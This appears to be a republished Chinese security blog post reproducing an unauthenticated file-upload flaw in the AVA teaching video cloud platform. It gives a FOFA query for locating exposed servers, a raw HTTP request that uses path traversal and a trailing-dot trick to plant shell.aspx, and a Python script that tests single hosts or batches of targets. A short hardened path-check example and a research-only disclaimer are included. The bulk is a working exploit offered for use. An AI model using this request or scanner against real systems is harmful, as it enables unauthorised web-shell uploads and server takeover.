The AVA (奥威亚) Teaching Video Application Cloud Platform has an arbitrary file upload vulnerability in the UploadFile.aspx interface. An unauthenticated attacker can upload a malicious backdoor file through it, execute arbitrary code, and thereby obtain control of the server.
FOFA:
body="/Upload/DomainInfo/MaxAVALogo.png"
POST /Services/WeikeCutOut/UploadFile.aspx?VideoGuid=/../../ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=----sajhdjqwjejqwbejhqwbjebqwhje

------sajhdjqwjejqwbejhqwbjebqwhje
Content-Disposition: form-data; name="file"; filename="shell.aspx."
Content-Type: image/jpeg

123
------sajhdjqwjejqwbejhqwbjebqwhje--
The VideoGuid parameter is used as a path component without validation, so "/../../" walks out of the upload directory, and the trailing dot in "shell.aspx." is dropped by Windows when the file is written, so the file lands as shell.aspx. Then access http://ip/shell.aspx
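The two weaknesses the request above relies on (an unvalidated VideoGuid used as a directory name, and an extension check defeated by a trailing dot) are what a fix has to close. The following is an added example of a hardened server-side path check, not code from the product or from the original post; the upload root and the extension allowlist are assumptions.

```python
import os
import uuid

# Assumed allowlist of upload types; the real product's list is not on the page.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".mp4"}


def normalise_client_filename(filename):
    """Reduce a client-supplied filename to a safe base name, or return None."""
    if not isinstance(filename, str) or "\x00" in filename:
        return None
    # Keep only the last path component, treating both separators as separators.
    name = os.path.basename(filename.replace("\\", "/"))
    # NTFS/IIS drops trailing dots and spaces when creating a file, so
    # "shell.aspx." is stored as "shell.aspx": strip them before any check.
    name = name.rstrip(". ")
    if not name or name in (".", ".."):
        return None
    return name


def safe_upload_path(upload_root, video_guid, filename):
    """Return the destination path for a valid upload, or None if it must be rejected."""
    # VideoGuid becomes a directory name, so it must parse as a real GUID;
    # values such as "/../../" fail here and never reach the filesystem.
    try:
        guid = str(uuid.UUID(video_guid))
    except (ValueError, TypeError, AttributeError):
        return None
    name = normalise_client_filename(filename)
    if name is None:
        return None
    # Allowlist the extension of the *normalised* name, case-insensitively.
    if os.path.splitext(name)[1].lower() not in ALLOWED_EXTENSIONS:
        return None
    root = os.path.realpath(upload_root)
    dest = os.path.realpath(os.path.join(root, guid, name))
    # Defence in depth: the resolved path must still lie inside the upload root.
    if os.path.commonpath([root, dest]) != root:
        return None
    return dest
```

Storing the file under a server-generated name instead of the normalised client name removes the remaining dependence on client input entirely.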
# encoding:utf-8
import uuid
import requests
import argparse
import ssl
import urllib3

# ssl._create_unverified_context: create an SSL context that skips server certificate verification for HTTPS requests.
ssl._create_default_https_context = ssl._create_unverified_context
# urllib3.disable_warnings(): suppress the warning urllib3 raises for unverified HTTPS requests.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Console colours
RED = '\033[31m'
GREEN = '\033[32m'
RESET = '\033[0m'


def check_vuln(url):
    url = url.strip("/")
    target_url = url + "/Services/WeikeCutOut/UploadFile.aspx?VideoGuid=/../../"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Content-Type': 'multipart/form-data; boundary=----sajhdjqwjejqwbejhqwbjebqwhje'
    }
    # Random name so repeated checks do not collide; the trailing dot in the
    # multipart filename is stripped by Windows, so the stored name matches upload_url.
    unique_filename = f"{uuid.uuid4()}.aspx"
    data = f"""------sajhdjqwjejqwbejhqwbjebqwhje\r
Content-Disposition: form-data; name="file"; filename="{unique_filename}."\r
Content-Type: image/jpeg\r
\r
123\r
------sajhdjqwjejqwbejhqwbjebqwhje--"""
    upload_url = url + f"/{unique_filename}"
    try:
        response = requests.post(target_url, headers=headers, data=data, verify=False, timeout=20)
        if response.status_code == 200 and "Success" in response.text:
            print(f"{RED}[+] {url} 存在漏洞,漏洞地址为{upload_url}{RESET}")
            return True
    except requests.exceptions.RequestException:
        pass
    return False


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="目标URL")
    parser.add_argument("-f", "--file", help="目标文件")
    args = parser.parse_args()
    if args.url:
        # Prepend a scheme when the target was given as a bare host
        args.url = "http://" + args.url.strip("/") if not args.url.startswith(("http://", "https://")) else args.url
        check_vuln(args.url)
    elif args.file:
        with open(args.file, "r") as f:
            content = f.read().splitlines()
        for url in content:
            url = "http://" + url.strip("/") if not url.startswith(("http://", "https://")) else url
            check_vuln(url)
    else:
        print("请输入目标URL或目标文件")


if __name__ == "__main__":
    main()
python .\AVA-Teaching_video_application_cloud_platform-FileUpload.py -f .\2.txt
python .\AVA-Teaching_video_application_cloud_platform-FileUpload.py -u 192.168.1.1
Originally published on the WeChat public account 扫地僧的茶饭日常: [Vulnerability Reproduction] AVA (奥威亚) Teaching Video Application Cloud Platform - Arbitrary File Upload Vulnerability (with batch verification script)
Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes no legal or joint liability. For any issues, contact us by email (preferably from a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).